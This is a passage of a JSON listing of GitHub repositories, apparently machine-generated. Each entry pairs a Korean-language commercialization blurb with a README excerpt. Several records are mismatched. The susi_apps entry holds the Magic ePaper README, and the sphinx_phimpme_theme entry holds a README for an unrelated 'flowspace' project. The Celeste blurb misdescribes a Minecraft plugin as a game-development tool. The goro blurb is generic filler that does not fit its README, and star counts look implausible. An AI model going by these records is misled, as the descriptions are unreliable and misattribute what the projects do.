spoken translation (via browser WebRTC mic capture → ingest API).\n- **The booth coordination layer** — a Flask + Socket.IO server that tracks participant roles (active interpreter, backup, coordinator, listener), enforces single-publisher-per-channel rules, handles handoffs, and runs internal booth chat.\n- **The ingest bridge** — an `aiortc`-powered endpoint that","composite_score":0.2026,"license_safety_tag":"safe"},{"name":"susiai/susi_apps","github_url":"https://github.com/susiai/susi_apps","stars":11,"language":"Dart","license":"Apache-2.0","abandonment_months":0,"description":"# SUSI Apps 저장소 분석\n\n## 왜 보물인가\n인공지능 기반의 개인 비서 애플리케이션으로, 사용자가 쉽게 접근할 수 있는 AI 기술을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 챗봇 플랫폼으로 제공하여 기업들이 고객 상담 자동화에 활용\n2. **내부 업무 도구**: 직원들의 업무 효율화를 위한 개인 AI 어시스턴트 시","readme_excerpt":"<img height=\"200px\" src=\"./assets/docs/app_icon.png\" align=\"right\" />\n\n# Magic ePaper\n![Github](https://img.shields.io/github/license/fossasia/magic-epaper-app?logo=github)\n\n**Magically Create and Transfer Content to NFC ePaper Badges**\n\nThe Magic ePaper app is an open-source Flutter application that lets users design and transfer content to a tri-color, battery-free NFC ePaper badge. The app features an intuitive UI with drawing tools, text input, emoji support, font customization, and image editing (rotation, brightness, contrast, filters optimized for ePaper such as Floyd–Steinberg and Atkinson dithers). It supports NFC-based reading/writing of images and advanced NDEF data (text, URLs, vCards, app launch). A built-in Image Library stores processed images for quick transfers. Additional tools include QR/barcode generation, employee ID, and price tag creation.\n\n## Download\n\n* [Latest Release Build](https://github.com/fossasia/magic-epaper-app/tree/app) in the app branch\n\n## Permissio","composite_score":0.2026,"license_safety_tag":"safe"},{"name":"tornadoweb/tornado","github_url":"https://github.com/tornadoweb/tornado","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"# Tornado Web Framework 분석\n\n## 왜 보물인가\n웹 서비스를 빠르고 안정적으로 만들기 위한 검증된 기초 도구로, 많은 대규모 서비스가 이미 사용 중인 신뢰성 높은 기술입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 채팅 플랫폼**: 많은 사용자의 동시 접속을 효율적으로 처리하는 SaaS 서비스\n- **데이터 대시보드**: 기업 내부에서","readme_excerpt":"Tornado Web Server\n==================\n\n.. image:: https://badges.gitter.im/Join%20Chat.svg\n   :alt: Join the chat at https://gitter.im/tornadoweb/tornado\n   :target: https://gitter.im/tornadoweb/tornado?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\n\n`Tornado <http://www.tornadoweb.org>`_ is a Python web framework and\nasynchronous networking library, originally developed at `FriendFeed\n<http://friendfeed.com>`_.  By using non-blocking network I/O, Tornado\ncan scale to tens of thousands of open connections, making it ideal for\n`long polling <http://en.wikipedia.org/wiki/Push_technology#Long_Polling>`_,\n`WebSockets <http://en.wikipedia.org/wiki/WebSocket>`_, and other\napplications that require a long-lived connection to each user.\n\nHello, world\n------------\n\nHere is a simple \"Hello, world\" example web app for Tornado:\n\n.. code-block:: python\n\n    import asyncio\n    import tornado\n\n    class MainHandler(tornado.web.RequestHandler):\n        def get(self):\n       ","composite_score":0.2025,"license_safety_tag":"safe"},{"name":"symfony/finder","github_url":"https://github.com/symfony/finder","stars":11,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Symfony Finder 상용화 분석\n\n## 왜 보물인가\n컴퓨터의 파일을 자동으로 찾고 정렬해주는 기술로, 수백만 개의 파일 중에서 필요한 것만 빠르게 검색할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 서비스** - 사용자의 파일을 자동 분류하고 빠르게 검색해주는 기능\n2. **기업용 문서 관리 도구** - 수천 개의 계약서, ","readme_excerpt":"Finder Component\n================\n\nThe Finder component finds files and directories via an intuitive fluent\ninterface.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/finder.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.2024,"license_safety_tag":"safe"},{"name":"libobjc/SGPlayer","github_url":"https://github.com/libobjc/SGPlayer","stars":11,"language":"Objective-C","license":"mit","abandonment_months":15,"description":"# SGPlayer 저장소 분석\n\n## 왜 보물인가\niPhone이나 iPad에서 영상을 재생하는 기능을 간단하게 만들 수 있는 도구로, 앱 개발자들이 직접 만들기 어려운 부분을 대신 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **동영상 스트리밍 앱 제작 서비스**: 유튜브처럼 영상을 보여주는 앱을 만들고 싶은 개인 개발자나 스타트업에게 기술 지원\n2. *","readme_excerpt":"![Logo](https://github.com/libobjc/SGPlayer/blob/master/documents/banner.jpg?raw=true)\n\n\n![Build Status](https://img.shields.io/badge/build-%20passing%20-brightgreen)  ![License](https://img.shields.io/badge/license-MIT-red) ![Platform](https://img.shields.io/badge/Platform-%20iOS%20macOS%20tvOS%20-blue)\n\n# SGPlayer \n\n- SGPlayer is a powerful media play framework for iOS, macOS, and tvOS.\n\n## Features\n\n- iOS, tvOS, macOS.\n- 360° panorama video.\n- Compose complex asset.\n- Background playback.\n- RTMP/RTSP streaming.\n- Setting playback speed.\n- Multiple audio/video tracks.\n- H.264/H.265 hardware accelerator.\n- Accurate status notifications.\n- Thread safety.\n\n## Based On\n\n- FFmpeg\n- Metal\n- AudioToolbox\n\n## Requirements\n\n- iOS 13.0 or later\n- tvOS 13.0 or later\n- macOS 10.15 or later\n\n## Getting Started\n\n#### Build FFmpeg and OpenSSL \n\n- Build scripts are used by default for FFmpeg 4.4.4 and OpenSSL 1.1.1w\n\n```obj-c\ngit clone https://github.com/libobjc/SGPlayer.git\ncd SGPlayer\ngit checkout","composite_score":0.2024,"license_safety_tag":"safe"},{"name":"IdreesInc/Celeste","github_url":"https://github.com/IdreesInc/Celeste","stars":5,"language":"Java","license":"GPL-3.0","abandonment_months":10,"description":"# Celeste 저장소 분석\n\n## 왜 보물인가\n게임 개발이나 인터랙티브 애플리케이션 제작 시 복잡한 기술을 간단하게 처리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **인디 게임 개발 플랫폼 SaaS**: 초보자 게임 개발자들이 구독 결제로 고급 기능을 사용하는 웹 서비스\n2. **게임 스튜디오 내부 제작 도구**: 중소 게임사의 팀 협업을","readme_excerpt":"# Celeste - Add shooting stars to your Minecraft server\nCeleste is a simple plugin that adds shooting stars to your Minecraft server. Inspired by the shooting stars from Animal Crossing and the falling stars from Breath of the Wild, this plugin brings some celestial ambience to your Minecraft world.\n\n[Check out the overview video](https://www.youtube.com/watch?v=TXdrECjVTiU)\n\n[Download the server plugin on Spigot](https://www.spigotmc.org/resources/celeste.81862/)\n\n[Learn more about Celeste (the plugin, not the owl)](https://idreesinc.com/about-celeste.html?utm_source=github&utm_medium=readme&utm_campaign=celeste)\n\n<a href=\"https://discord.gg/6yxE9prcNc\" target=\"_blank\">\n\t<img alt=\"Discord\" src=\"https://img.shields.io/discord/1398471368403583120?logo=discord&logoColor=fff&label=discord&color=5865F2\">\n</a>\n\n## Features\n- Add shooting stars to the night sky, with configurable frequency\n- Find rare falling stars that deliver precious materials in a sparkling package\n- Watch meteor showers","composite_score":0.2023,"license_safety_tag":"restricted"},{"name":"ScriptedAlchemy/webpack-external-import","github_url":"https://github.com/ScriptedAlchemy/webpack-external-import","stars":6,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":0,"description":"# webpack-external-import 평가 보고서\n\n## 왜 보물인가\n여러 개의 독립적인 웹 서비스들이 마치 하나의 거대한 애플리케이션처럼 작동하도록 연결해주는 기술로, 대규모 조직의 웹 개발 비용을 획기적으로 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 금융회사의 여러 부서(영업, 운영, 고객관리)가 각각 개발한 ","readme_excerpt":"# Webpack External Import\n\n> **import() other chunks and modules from third parties, or other webpack builds themselves! At runtime!**\n\n## This is now part of Webpack 5 - do not use external-import, read more here: http://module-federation.github.io/\n\n<p align=\"center\">\n\n[![Commitizen friendly](https://img.shields.io/badge/commitizen-friendly-brightgreen.svg)](http://commitizen.github.io/cz-cli/)\n  <a href=\"https://www.npmjs.com/package/webpack-external-import\">\n    <img src=\"https://img.shields.io/npm/v/webpack-external-import.svg\" alt=\"Version\" />\n  </a>\n\n  <a href=\"https://www.npmjs.com/package/webpack-external-import\">\n    <img src=\"https://img.shields.io/npm/dt/webpack-external-import.svg\" alt=\"Downloads\" />\n  </a>\n\n  <a href=\"https://www.npmjs.com/package/webpack-external-import\">\n    <img src=\"https://img.shields.io/npm/dm/webpack-external-import.svg\" alt=\"License\" />\n  </a>\n\n  <a href=\"https://www.npmjs.com/package/webpack-external-import\">\n    <img src=\"https://img.shields.io/","composite_score":0.2022,"license_safety_tag":"safe"},{"name":"mlpack/mlpack","github_url":"https://github.com/mlpack/mlpack","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# mlpack 저장소 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터 분석 작업을 자동으로 처리해주는 도구로, 기업들이 의사결정에 필요한 패턴을 빠르게 찾을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 분석 SaaS 플랫폼**\n- 중소 회사들이 자체 데이터를 업로드하면 자동으로 트렌드와 이상 신호를 감지해주는 웹 서비스\n\n**2. 기업 ","readme_excerpt":"<h2 align=\"center\">\n  <a href=\"https://mlpack.org\"><img src=\"https://cdn.jsdelivr.net/gh/mlpack/mlpack.org@e7d36ed8/mlpack-black.svg\" style=\"background-color:rgba(0,0,0,0);\" height=230 alt=\"mlpack: a fast, header-only machine learning library\"></a>\n  <br>a fast, header-only machine learning library<br>\n</h2>\n\n<h5 align=\"center\">\n  <a href=\"https://mlpack.org\">Home</a> |\n  <a href=\"https://www.mlpack.org/download.html\">Download</a> |\n  <a href=\"https://www.mlpack.org/doc/index.html\">Documentation</a> |\n  <a href=\"https://www.mlpack.org/questions.html\">Help</a>\n</h5>\n\n<p align=\"center\">\n  <a href=\"https://github.com/mlpack/mlpack/actions/workflows/ci.yml\"><img alt=\"GitHub Actions CI\" src=\"https://github.com/mlpack/mlpack/actions/workflows/ci.yml/badge.svg\"></a>\n  <a href=\"https://opensource.org/license/BSD-3-Clause\"><img src=\"https://img.shields.io/badge/License-BSD%203--Clause-blue.svg?style=flat-square\" alt=\"License\"></a>\n  <a href=\"https://numfocus.org/donate-to-mlpack\"><img src=\"http","composite_score":0.2021,"license_safety_tag":"unknown"},{"name":"fossasia/sphinx_phimpme_theme","github_url":"https://github.com/fossasia/sphinx_phimpme_theme","stars":12,"language":"","license":"Apache-2.0","abandonment_months":0,"description":"# fossasia/sphinx_phimpme_theme 분석\n\n## 왜 보물인가\n문서 작성 도구의 시각적 디자인을 현대적으로 개선하여, 기술 문서를 읽기 쉽고 아름답게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기술 문서 자동 생성 플랫폼에서 이 디자인 템플릿을 기본 스타일로 제공하여 고객사 문서의 전문성 향상\n- **내부","readme_excerpt":"## flowspace\r\nflowspace is an independent spatial video lounge service. \r\n\r\nIt provides informal, hallway-style interaction for online and hybrid events.\r\nParticipants move freely in a shared space.\r\nAudio volume adapts automatically based on proximity.\r\nThis project is inspired by Chatmosphere, but uses a new implementation.\r\nIt is built for modern web technologies and current Jitsi versions.\r\nThe original Chatmosphere project is no longer actively maintained.\r\nFlowspace provides a sustainable, extensible, and service-agnostic approach.\r\n\r\n## Project status\r\nThis project is in the design and and early implementation phase.\r\nThe repository focuses on:\r\n\r\n* Architecture decisions\r\n* Integration contracts\r\n* Deployment strategy\r\n* Contributor onboarding\r\n* Incremental implementation milestones\r\n\r\nNo stable releases or production-ready builds exist yet.\r\n\r\n## Motivation\r\nOnline conferences lack informal social spaces.\r\nPhysical events naturally have hallway conversations, spontaneous meet","composite_score":0.2021,"license_safety_tag":"safe"},{"name":"30-seconds/30-seconds-of-code","github_url":"https://github.com/30-seconds/30-seconds-of-code","stars":29,"language":"JavaScript","license":"CC-BY-4.0","abandonment_months":0,"description":"# 30-Seconds-of-Code 저장소 분석\n\n## 왜 보물인가\n프로그래밍 초보자부터 경력자까지 일상에서 자주 쓰는 코딩 기법을 30초 안에 배우고 복사해서 바로 쓸 수 있는 실용적인 참고서입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 교육 플랫폼 SaaS**\n코딩 학원이나 온라인 강의 사이트에서 이 콘텐츠를 구독하여 학생들의 학습 자료로 제공","readme_excerpt":"[![Logo](/logo.png)](https://30secondsofcode.org/js/p/1)\n\n# 30 seconds of code\n\n> Coding articles to level up your development skills\n\n* Visit [the website](https://30secondsofcode.org) to view all articles.\n* Search for articles and collections that suit your needs, using the name, tags, language or description.\n* Browse all [articles](https://30secondsofcode.org/snippets/p/1) or individual [collections](https://30secondsofcode.org/collections/p/1) for each topic.\n* Click on each card to view the whole article, including code snippets, explanation and examples.\n* If you like the project, give it a star. It means a lot.\n\n## Want to contribute?\n\n* New content contributions are not accepted at this time.\n* You can, however, report problems with the website or suggest improvements by [opening an issue](https://github.com/Chalarangelo/30-seconds-of-code/issues/new).\n\n## Credits\n\n* This repository is maintained by [Angelos Chalaris](https://github.com/Chalarangelo).\n* All code snippets are ","composite_score":0.2021,"license_safety_tag":"unknown"},{"name":"symfony/filesystem","github_url":"https://github.com/symfony/filesystem","stars":7,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Symfony Filesystem 상용화 분석\n\n## 왜 보물인가\n컴퓨터의 파일을 안전하고 쉽게 관리할 수 있게 해주는 도구로, 많은 기업 서비스의 핵심 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 저장소 서비스(SaaS)**\n- 개인과 기업이 파일을 온라인에 저장하고 공유할 수 있는 플랫폼 (Google Drive, Dropbox ","readme_excerpt":"Filesystem Component\n====================\n\nThe Filesystem component provides basic utilities for the filesystem.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/filesystem.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.2021,"license_safety_tag":"safe"},{"name":"Wechat-Group/WxJava","github_url":"https://github.com/Wechat-Group/WxJava","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# WxJava 저장소 분석 리포트\n\n## 왜 보물인가\n중국 최대 메신저 '위챗'과 연결되는 프로그램을 쉽게 만들 수 있는 도구라서, 중국 시장에서 고객과 소통하는 기업들에게 매우 필요합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 위챗을 통한 고객 상담 자동화 솔루션으로 한국 기업의 중국 진출을 지원\n- **내부 업무 도구**: 기업의 위","readme_excerpt":"## WxJava - 微信开发 Java SDK\n[![Github](https://img.shields.io/github/stars/binarywang/WxJava?logo=github&style=flat&label=Stars)](https://github.com/binarywang/WxJava)\n[![Gitee](https://gitee.com/binary/weixin-java-tools/badge/star.svg?theme=blue)](https://gitee.com/binary/weixin-java-tools)\n[![GitCode](https://gitcode.com/binary/WxJava/star/badge.svg)](https://gitcode.com/binary/WxJava)\n\n[![GitHub release](https://img.shields.io/github/release/binarywang/WxJava?label=Release)](https://github.com/binarywang/WxJava/releases)\n[![Maven Central](https://img.shields.io/maven-central/v/com.github.binarywang/wx-java?label=Maven)](https://central.sonatype.com/artifact/com.github.binarywang/wx-java/versions)\n[![Build Status](https://img.shields.io/circleci/project/github/binarywang/WxJava/develop.svg?sanitize=true&label=Build)](https://circleci.com/gh/binarywang/WxJava/tree/develop)\n[![使用IntelliJ IDEA开发维护](https://img.shields.io/badge/IntelliJ%20IDEA-支持-blue.svg)](https://www.jetbrains.com/?from=","composite_score":0.2021,"license_safety_tag":"safe"},{"name":"LikeTheSalad/android-string-reference","github_url":"https://github.com/LikeTheSalad/android-string-reference","stars":7,"language":"Kotlin","license":"MIT","abandonment_months":0,"description":"# android-string-reference 분석\n\n## 왜 보물인가\n안드로이드 앱 개발 시 텍스트 관리를 자동화하여 개발자의 반복 작업을 줄여주는 개발 보조 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발사 내부 도구 SaaS**: 안드로이드 앱 개발팀이 구독하는 형태로, 클라우드 기반 텍스트 관리 플랫폼으로 제공\n2. **API 판매**: 다","readme_excerpt":"# Android Stem\n\n[![version](https://img.shields.io/gradle-plugin-portal/v/com.likethesalad.stem)](https://plugins.gradle.org/plugin/com.likethesalad.stem)\n\n[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donate_LG.gif)](https://www.paypal.com/donate/?hosted_button_id=VJWEQ767PEYCA)\n[<img src=\"https://cdn.ko-fi.com/cdn/kofi2.png?v=3\" alt=\"ko-fi\" width=\"100px\"/>](https://ko-fi.com/N4N31QU53)\n\n---\n\n## What It Is\n\n**Android Stem** is a Gradle plugin that resolves placeholders in XML string resources at **compile time**.  \nNo Java or Kotlin code is required — the plugin generates fully resolved strings accessible just like any other resource\nin your app.\n\nIf you want to do this:\n\n#### Input\n\n```xml\n\n<resources>\n    <string name=\"app_name\">My App Name</string>\n    <string name=\"welcome_message\">Welcome to ${app_name}</string>\n</resources>\n```\n\n#### Output\n\n```xml\n<!-- Auto-generated during compilation -->\n<resources>\n    <string name=\"welcome_message\">Welcome to My App Name</string>","composite_score":0.2019,"license_safety_tag":"safe"},{"name":"thinkgem/jeesite","github_url":"https://github.com/thinkgem/jeesite","stars":7,"language":"Vue","license":"apache-2.0","abandonment_months":0,"description":"# JeeSite 저장소 분석\n\n## 왜 보물인가\n기업이 필요한 기본적인 업무 관리 시스템을 빠르게 구축할 수 있도록 미리 만들어진 틀을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업용 전자결재·인사관리 클라우드 솔루션으로 패키징하여 월 구독료 수익화\n2. **내부 업무 도구**: 기존 레거시 시스템을 교체하는 현대화 솔루션","readme_excerpt":"\n\n<p align=\"center\">\n <img alt=\"JeeSite\" src=\"https://jeesite.com/assets/images/logo.png\" width=\"120\" height=\"120\" style=\"margin-bottom: 10px;\">\n</p>\n<h3 align=\"center\" style=\"margin:30px 0 30px;font-weight:bold;font-size:30px;\">\n  JeeSite Vue3 前端源码<br>\n  使用 Turborepo、Monorepo、pnpm<br>\n  快速构建、模块化、代码复用、高效管理\n</h3>\n<p align=\"center\">\n <a href=\"https://v3.cn.vuejs.org/\" target=\"__blank\"><img alt=\"TypeScript-Vite8\" src=\"https://img.shields.io/badge/TypeScript-Vite8-green.svg\"></a>\n <a href=\"https://www.antdv.com/\" target=\"__blank\"><img alt=\"Ant Design Vue-Vue3\" src=\"https://img.shields.io/badge/Ant Design Vue-Vue3-brightgreen.svg\"></a>\n <a href=\"https://jeesite.com\" target=\"__blank\"><img alt=\"JeeSite-V5.x\" src=\"https://img.shields.io/badge/JeeSite-V5.x-blue.svg\"></a>\n <a href=\"https://gitee.com/thinkgem/jeesite5\" target=\"__blank\"><img alt=\"star\" src=\"https://gitee.com/thinkgem/jeesite5/badge/star.svg?theme=dark\"></a>\n <a href=\"https://gitee.com/thinkgem/jeesite-vue\" target=\"__blank\"><img al","composite_score":0.2017,"license_safety_tag":"safe"},{"name":"Microsoft/Windows-universal-samples","github_url":"https://github.com/Microsoft/Windows-universal-samples","stars":6,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Microsoft Windows 유니버설 샘플 코드 분석\n\n## 왜 보물인가\n마이크로소프트가 공식 제공하는 윈도우 프로그램 만드는 법 설명서로, 신뢰도 높은 학습 자료이자 기술 개발의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **윈도우 소프트웨어 개발 교육 플랫폼**: 프로그래밍 학원이나 온라인 강의에서 실제 예제로 활용\n2. **기업용","readme_excerpt":"<!---\n  samplefwlink: http://go.microsoft.com/fwlink/p/?LinkId=619979\n--->\n\n# Universal Windows Platform (UWP) app samples\n\nThis repo contains the samples that demonstrate the API usage patterns for the Universal Windows Platform (UWP) in the Windows Software Development Kit (SDK) for Windows 10. These code samples were created with the Universal Windows Platform templates available in Visual Studio, and are designed to run on desktop, mobile, and future devices that support the Universal Windows Platform.\n\n> **Note:** If you are unfamiliar with Git and GitHub, you can download the entire collection as a \n> [ZIP file](https://github.com/Microsoft/Windows-universal-samples/archive/main.zip), but be \n> sure to unzip everything to access shared dependencies. For more info on working with the ZIP file, \n> the samples collection, and GitHub, see [Get the UWP samples from GitHub](https://aka.ms/ovu2uq). \n> For more samples, see the [Samples portal](https://aka.ms/winsamples) on the Windows D","composite_score":0.2017,"license_safety_tag":"safe"},{"name":"looly/hutool","github_url":"https://github.com/looly/hutool","stars":14,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"# Hutool 저장소 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 반복적으로 작성하는 기본 작업들을 미리 만들어 놓은 도구 모음으로, 소프트웨어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원가입, 로그인, 데이터 검증 같은 기본 기능이 필요한 웹 서비스에 내장하여 개발 속도 향상\n- **내부 업무 도","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://hutool.cn/\"><img src=\"https://cdn.jsdelivr.net/gh/looly/hutool-site/images/logo.jpg\" width=\"45%\"></a>\n</p>\n<p align=\"center\">\n    <strong>🍬A set of tools that keep Java sweet.</strong>\n</p>\n<p align=\"center\">\n    👉 <a href=\"https://hutool.cn\">https://hutool.cn/</a> 👈\n</p>\n\n<p align=\"center\">\n    <a target=\"_blank\" href=\"https://search.maven.org/artifact/cn.hutool/hutool-all\">\n        <img src=\"https://img.shields.io/maven-central/v/cn.hutool/hutool-all.svg?label=Maven%20Central\" />\n    </a>\n    <a target=\"_blank\" href=\"https://license.coscl.org.cn/MulanPSL2\">\n        <img src=\"https://img.shields.io/:license-MulanPSL2-blue.svg\" />\n    </a>\n    <a target=\"_blank\" href=\"https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html\">\n        <img src=\"https://img.shields.io/badge/JDK-8+-green.svg\" />\n    </a>\n    <a target=\"_blank\" href=\"https://app.travis-ci.com/chinabugotech/hutool\">\n        <img src=\"https://api.travis-ci.com/chinabu","composite_score":0.2017,"license_safety_tag":"unknown"},{"name":"caesar0301/awesome-public-datasets","github_url":"https://github.com/caesar0301/awesome-public-datasets","stars":10,"language":"","license":"mit","abandonment_months":0,"description":"# awesome-public-datasets 사업화 분석\n\n## 왜 보물인가\n누구나 자유롭게 사용할 수 있는 공개 데이터들을 한곳에 모아놓아서, 데이터가 필요한 사람들이 찾는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **데이터 검색 SaaS**: \"어떤 데이터를 찾고 있나요?\"에 답하는 구글 같은 검색 서비스로, 월 구독료를 받고 고","readme_excerpt":"Awesome Public Datasets\n=======================\n\n.. image:: https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\n   :alt: Awesome\n   :target: https://github.com/sindresorhus/awesome\n\nThis is a list of `topic-centric public data sources <https://github.com/awesomedata/awesome-public-datasets>`_\nin high quality. They are collected and tidied from blogs, answers, and user responses.\nMost of the data sets listed below are free, however, some are not.\nThis project was incubated at `OMNILab <https://github.com/OMNILab>`_, Shanghai Jiao Tong University during Xiaming Chen's Ph.D. studies.\nOMNILab is now part of the `BaiYuLan Open AI community <https://github.com/Bai-Yu-Lan>`_.\nOther amazingly awesome lists can be found in `sindresorhus's awesome <https://github.com/sindresorhus/awesome>`_ list.\n\n**NOTICE**: This repo is automatically generated by `apd-core <https://github.com/awesomedata/apd-core/tree/master/core>`_.\nPlease **DO NOT** modify thi","composite_score":0.2017,"license_safety_tag":"safe"},{"name":"imhuay/Algorithm_Interview_Notes-Chinese","github_url":"https://github.com/imhuay/Algorithm_Interview_Notes-Chinese","stars":14,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Algorithm_Interview_Notes-Chinese 상품화 분석\n\n## 왜 보물인가\n취업 준비생들이 어려워하는 알고리즘 문제를 체계적으로 정리한 학습 자료로, 면접 합격률을 높이는 데 직접 도움이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월구독 형태의 온라인 알고리즘 학습 플랫폼 (동영상 강의, 문제 풀이, 진","readme_excerpt":"<!-- <div style=\"text-align: center\"> -->\n<div align=\"center\">  <!-- style=\"text-align: center\" 在 GitHub 主页不生效 -->\n\n# Study Space\n\n[![wakatime](https://wakatime.com/badge/user/c840568d-e4b1-4c63-ade0-03856283d319.svg)](https://wakatime.com/@c840568d-e4b1-4c63-ade0-03856283d319)\n[![daily update](https://github.com/imhuay/sspace/actions/workflows/daily.yml/badge.svg?branch=master)](https://github.com/imhuay/sspace/actions?query=workflow:daily)\n[![GitHub commit activity](https://img.shields.io/github/commit-activity/m/imhuay/sspace?color=active)](https://github.com/imhuay/sspace/commits/master)\n[![GitHub issues](https://img.shields.io/github/issues/imhuay/sspace?color=important)](https://github.com/imhuay/sspace/issues)\n[![](https://visitor-badge.laobi.icu/badge?page_id=imhuay.sspace&right_color=green&left_text=page%20views)](https://visitor-badge.laobi.icu)\n\n<!-- \n[![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/imhuay/sspace?color=inactive)](https://github.com/im","composite_score":0.2015,"license_safety_tag":"safe"},{"name":"MagicalTux/goro","github_url":"https://github.com/MagicalTux/goro","stars":10,"language":"PHP","license":"BSD-3-Clause","abandonment_months":0,"description":"# MagicalTux/goro 분석 보고서\n\n## 왜 보물인가\n작은 규모지만 특정 기술 문제를 효율적으로 해결하는 도구로, 전문가 집단에서 신뢰할 수 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 금융사나 기술 회사의 백엔드 시스템에 통합되어 자동화된 작업 처리 수행\n2. **API 판매**: 다른 소프트웨어 개발사에 라이","readme_excerpt":"# Goro\n\n[![CI](https://github.com/KarpelesLab/goro/actions/workflows/ci.yml/badge.svg)](https://github.com/KarpelesLab/goro/actions/workflows/ci.yml)\n[![Coverage Status](https://coveralls.io/repos/github/KarpelesLab/goro/badge.svg?branch=master)](https://coveralls.io/github/KarpelesLab/goro?branch=master)\n[![Go Reference](https://pkg.go.dev/badge/github.com/KarpelesLab/goro.svg)](https://pkg.go.dev/github.com/KarpelesLab/goro)\n\nPHP engine implemented in pure Go. Feature-complete for PHP 8.5 language features.\n\n## Why?\n\nPHP is a nice language but is having trouble keeping up with modern languages. This implementation makes a number of things possible:\n\n* Usage of goroutines, go channels, etc from within PHP\n* Better caching of compiled code by allowing sharing of compiled or live objects (classes, objects, etc) between running PHP scripts\n* Use Go's memory management within PHP\n* Ability to run functions or code sandboxed (including filesystem via `fs.FS`) to limit security risks\n* Easi","composite_score":0.2015,"license_safety_tag":"safe"},{"name":"bitcoin/bips","github_url":"https://github.com/bitcoin/bips","stars":8,"language":"Wikitext","license":"unknown","abandonment_months":0,"description":"# Bitcoin BIPs 저장소 분석\n\n## 왜 보물인가\n비트코인의 규칙과 표준을 정의하는 공식 문서 모음으로, 블록체인 기술의 기반이 되는 핵심 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 플랫폼**: 비트코인 개발자 교육과정에 표준 문서를 통합한 SaaS 서비스\n2. **암호화폐 거래소**: 비트코인 업그레이드 추적 시스템을 API로","readme_excerpt":"People wishing to submit a BIP should first describe their idea to the [https://groups.google.com/g/bitcoindev bitcoindev@googlegroups.com]\nmailing list to gather feedback on viability and community interest before working on a\nformal description. Please open a pull request to this repository only when substantial progress on the draft has been\nmade, preferably when the draft is nearing completion. Authors do <em>not</em> assign a number to their own proposal.\nAfter a proposal meets the editorial criteria, a BIP Editor will assign a number to it and publish the proposal by\nmerging the pull request to the repository. Please see [[bip-0003.md|BIP 3: Updated BIP Process]] for the full process.\n\nThe BIPs repository serves as a publication medium and archive. Having a BIP published here indicates that the proposal\nis in scope and has met other formal criteria for this repository, but does not indicate that it is a good idea, has\ncommunity consensus, or that it is about to be adopted. The BI","composite_score":0.2014,"license_safety_tag":"unknown"},{"name":"TwoWater/Python","github_url":"https://github.com/TwoWater/Python","stars":7,"language":"Python","license":"CC-BY-4.0","abandonment_months":0,"description":"# TwoWater/Python 저장소 분석\n\n## 왜 보물인가\nPython 프로그래밍 학습 또는 실무 자동화를 위한 실전 코드 모음으로, 개발자들이 바퀴를 다시 만들지 않고 검증된 솔루션을 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 반복적인 데이터 처리나 보고서 자동화 시스템으로 활용\n- **SaaS 기반 기","readme_excerpt":"IT 行业相对于一般传统行业，发展更新速度更快，一旦停止了学习，很快就会被行业所淘汰，但是，我们要清楚：淘汰的永远只是那些初级水平的从业者，过硬技术的从业者永远都是稀缺的。因此对于学习，我们还是要踏踏实实的。\n\n\n自学 Python ，也是一样，不要一开始因为头脑发热就不停地收藏各种资料网站，购买各种书籍，下载了大量的教学视频，过了几天，学习的热情开始褪去，再过几个星期，终于完成了学习课程 —— 《从入门到放弃》。所以，学习 Python 需要一步一个脚印，踏踏实实地学。\n\n> 本教程基于 Python 3.10+ 编写，部分章节标注了 3.11/3.12/3.13 的新特性。两个在线站点任选：\n>\n> - **互动版**（推荐零基础）：[https://learn-py.org](https://learn-py.org) —— 